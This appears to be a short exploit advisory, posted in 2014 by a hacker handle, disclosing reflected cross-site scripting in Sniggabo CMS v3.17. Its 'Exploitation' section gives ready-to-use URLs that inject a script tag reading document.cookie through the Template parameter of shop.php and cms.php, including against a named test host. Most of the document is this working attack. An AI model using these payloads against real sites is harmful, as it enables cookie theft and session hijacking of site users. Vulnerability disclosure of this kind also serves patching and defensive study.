Sniggabo CMS v. 3.17 - Cross Site Scripting Vulnerability
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockout@e-mail.com.tr (onlymail)
[~] HomePage : http://h4x0resec.blogspot.com - http://Cyber-warrior.org
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Sniggabo CMS 
| Version : v. 3.17   (New version)
|~Software Official Website: http://www.sniggabo.no
|~Vulnerability Style : Cross Site Scripting
|[~]Date : "31.AG.2014"
|[~]Tested on : Kali Linux
~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploitation

http://Target.com/shop.php?Template= //Script
http://Target.com/cms.php?action=getpoll&Template= //Script

http://test.sniggabo.no/shop.php?Template="><script>alert(document.cookie)</script>
http://test.sniggabo.no/cms.php?action=getpoll&Template="><script>alert(document.cookie)</script>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~